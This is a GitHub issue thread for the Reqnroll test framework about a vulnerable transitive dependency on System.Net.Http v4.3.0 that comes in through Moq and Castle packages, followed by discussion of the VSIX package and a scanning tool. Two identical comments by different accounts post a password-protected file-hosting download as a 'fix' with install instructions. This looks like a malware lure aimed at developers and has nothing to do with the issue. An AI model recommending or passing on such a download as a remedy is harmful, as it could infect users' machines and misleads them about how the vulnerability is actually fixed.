### ISSUE TITLE
Project dependencies transiently refer to System.Net.Http <= v4.3.0 that has high severity security vulnerability

### ISSUE THREAD

**Issue by gasparnagy** [reqnroll/Reqnroll#240]
### Reqnroll Version

2.0.3

### Which test runner are you using?

MSTest

### Test Runner Version Number

n/a

### .NET Implementation

.NET 8.0

### Test Execution Method

Other – PLEASE SPECIFY

### Issue Description

The projects implicitly depend on System.Net.Http v4.3.0.

Detected dependency chains:
* Moq v4.17.2 -> Castle.Core v4.4.1 -> NETStandard.Library v1.6.1 -> System.Net.Http v4.3.0
* Castle.Windsor v5.1.2 -> Castle.Core v4.4.1 -> NETStandard.Library v1.6.1 -> System.Net.Http v4.3.0

### Steps to Reproduce

perform project security scan

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by sjxckson** [comment]
Hi. The VSIX package for Visual Studio is flagging the same issues where the same System package is being used and being raised as a security vulnerability

**Comment by gasparnagy** [comment]
@sjxckson Thx. I will create a separate issue for the VSIX.

Is the tool you have used to check is publicly available? I.e. can I rerun the check before releasing a new version?

**Comment by sjxckson** [comment]
> @sjxckson Thx. I will create a separate issue for the VSIX.
> 
> 
> 
> Is the tool you have used to check is publicly available? I.e. can I rerun the check before releasing a new version?

I created an issue a few minutes ago. Im not sure it is publicy available as we use it in-house. I can ask the question though.
